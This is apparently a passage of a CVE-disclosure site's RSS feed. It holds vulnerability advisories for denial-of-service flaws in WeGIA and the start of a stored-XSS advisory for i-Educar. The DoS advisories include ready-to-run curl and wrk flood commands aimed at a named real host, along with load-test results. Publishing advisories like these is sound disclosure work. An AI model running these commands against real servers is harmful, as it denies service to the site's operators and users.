    &amp;lt;li&amp;gt;During testing, the parameter was extended with repeated characters (&amp;lt;code&amp;gt;errorstr=-value-&amp;lt;/code&amp;gt;), causing resource exhaustion, timeouts, and errors in socket connections.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Steps to reproduce the issue:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Execute the following HTTP GET request to reproduce the issue:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  curl &amp;amp;#34;https://comfirewall.wegia.org:8000/WeGIA?errorstr=$(python3 -c &amp;amp;#39;print(&amp;amp;#34;A&amp;amp;#34;*8000)&amp;amp;#39;)&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;To simulate a high-load attack, use the &amp;lt;code&amp;gt;wrk&amp;lt;/code&amp;gt; tool:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  wrk -t12 -c400 -d60s &amp;amp;#34;https://comfirewall.wegia.org:8000/WeGIA?errorstr=$(python3 -c &amp;amp;#39;print(&amp;amp;#34;A&amp;amp;#34;*8000)&amp;amp;#39;)&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;video width=&amp;#34;100%&amp;#34; height=&amp;#34;100%&amp;#34; controls&amp;gt;
  &amp;lt;source src=&amp;#34;404392693-694ff24a-243a-429e-8225-b9de406355fc.mp4&amp;#34; type=&amp;#34;video/mp4&amp;#34;&amp;gt;
&amp;lt;/video&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Updated Test Results with &amp;lt;code&amp;gt;wrk&amp;lt;/code&amp;gt;:&amp;lt;/b&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;20,180 requests&amp;lt;/b&amp;gt; were processed in 1 minute.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;719 timeouts&amp;lt;/b&amp;gt; and &amp;lt;b&amp;gt;134 read errors&amp;lt;/b&amp;gt; occurred, indicating the server struggled to respond to the load.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Average latency was &amp;lt;b&amp;gt;249.77ms&amp;lt;/b&amp;gt;, with peaks reaching &amp;lt;b&amp;gt;2 seconds&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;The server attempted to handle the load but demonstrated significant resource exhaustion, confirming its vulnerability to DoS attacks.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This is a Denial of Service vulnerability. Any unauthenticated user with access to tools like OWASP ZAP can exploit this issue to make the server unresponsive. This affects the availability of the application and could disrupt business operations. The lack of rate limiting and recursive crawling restrictions increases the risk and makes the vulnerability exploitable by low-skilled attackers.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-562r-xgj9-2r7p&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-562r-xgj9-2r7p&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela0x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53531</title>
        <link>https://www.cvehunters.com/p/cve-2025-53531/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53531/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53531-uncontrolled-resource-consumption-in-wegia-parameter-fid&amp;#34;&amp;gt;CVE-2025-53531: Uncontrolled Resource Consumption in WeGIA parameter &amp;lt;code&amp;gt;fid&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53531&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53531&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The Wegia server has a vulnerability that allows excessively long HTTP GET requests to a specific URL. This issue arises from the lack of validation for the length of the &amp;lt;code&amp;gt;fid&amp;lt;/code&amp;gt; parameter. Tests confirmed that the server processes URLs up to 8,142 characters, resulting in high resource consumption, elevated latency, timeouts, and read errors. This makes the server susceptible to Denial of Service (DoS) attacks.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53531-uncontrolled-resource-consumption-in-wegia-parameter-fid&amp;#34;&amp;gt;CVE-2025-53531: Uncontrolled Resource Consumption in WeGIA parameter &amp;lt;code&amp;gt;fid&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53531&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53531&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The Wegia server has a vulnerability that allows excessively long HTTP GET requests to a specific URL. This issue arises from the lack of validation for the length of the &amp;lt;code&amp;gt;fid&amp;lt;/code&amp;gt; parameter. Tests confirmed that the server processes URLs up to 8,142 characters, resulting in high resource consumption, elevated latency, timeouts, and read errors. This makes the server susceptible to Denial of Service (DoS) attacks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET https://comfirewall.wegia.org:8000/WeGIA?fid=111251&amp;amp;amp;file_url=111256&amp;amp;amp;param1=AAAA&amp;amp;amp;param2=BBBB&amp;amp;amp;param3=CCCC...&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;The URL accepts parameters concatenated with &amp;lt;code&amp;gt;&amp;amp;&amp;lt;/code&amp;gt;, allowing attackers to add an arbitrary amount of data up to &amp;lt;b&amp;gt;8,142 characters.&amp;lt;/b&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;There is no validation for the total URL length or the number of parameters processed by the server.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;During testing, the URL was extended with repeated parameters (&amp;lt;code&amp;gt;&amp;amp;param=-value-&amp;lt;/code&amp;gt;), causing resource exhaustion and server instability.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Steps to reproduce the issue:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Execute the following HTTP GET request to reproduce the issue:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  curl &amp;amp;#34;https://comfirewall.wegia.org:8000/WeGIA?fid=111251&amp;amp;amp;file_url=111256$(python3 -c &amp;amp;#39;print(&amp;amp;#34;&amp;amp;amp;param=&amp;amp;#34; &#43; &amp;amp;#34;X&amp;amp;#34;*8000)&amp;amp;#39;)&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;To simulate a high-load attack, use the &amp;lt;code&amp;gt;wrk&amp;lt;/code&amp;gt; tool:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  wrk -t12 -c400 -d60s &amp;amp;#34;https://comfirewall.wegia.org:8000/WeGIA?fid=111251&amp;amp;amp;file_url=111256$(python3 -c &amp;amp;#39;print(&amp;amp;#34;&amp;amp;amp;param=&amp;amp;#34; &#43; &amp;amp;#34;X&amp;amp;#34;*8000)&amp;amp;#39;)&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;video width=&amp;#34;100%&amp;#34; height=&amp;#34;100%&amp;#34; controls&amp;gt;
  &amp;lt;source src=&amp;#34;404374779-e8006b99-a94b-4407-a3d5-64fbeaf985f5.mp4&amp;#34; type=&amp;#34;video/mp4&amp;#34;&amp;gt;
&amp;lt;/video&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Updated Test Results with &amp;lt;code&amp;gt;wrk&amp;lt;/code&amp;gt;:&amp;lt;/b&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Requests Processed:&amp;lt;/b&amp;gt; 20,799 requests in 1 minute, with 330.90 MB read.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Average Latency:&amp;lt;/b&amp;gt; 280.91ms, peaking at 2 seconds.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Errors:&amp;lt;/b&amp;gt; 98 read errors and 591 timeouts occurred.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Request Rate:&amp;lt;/b&amp;gt; 346.07 requests/sec.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Data Transfer:&amp;lt;/b&amp;gt; 5.51 MB/sec.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This is a Denial of Service vulnerability. Any unauthenticated user with access to tools like OWASP ZAP can exploit this issue to make the server unresponsive. This affects the availability of the application and could disrupt business operations. The lack of rate limiting and recursive crawling restrictions increases the risk and makes the vulnerability exploitable by low-skilled attackers.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-4ffc-f23j-54m3&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-4ffc-f23j-54m3&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela0x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7109</title>
        <link>https://www.cvehunters.com/p/cve-2025-7109/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7109/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7109-cross-site-scripting-xss-stored-endpoint-educar_aluno_beneficio_cadphp-parameter-benefício&amp;#34;&amp;gt;CVE-2025-7109: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_aluno_beneficio_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Benefício&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7109&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7109&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_aluno_beneficio_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Benefício&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_aluno_beneficio_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7109-cross-site-scripting-xss-stored-endpoint-educar_aluno_beneficio_cadphp-parameter-benefício&amp;#34;&amp;gt;CVE-2025-7109: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_aluno_beneficio_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Benefício&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7109&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7109&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_aluno_beneficio_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Benefício&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_aluno_beneficio_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Benefício&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
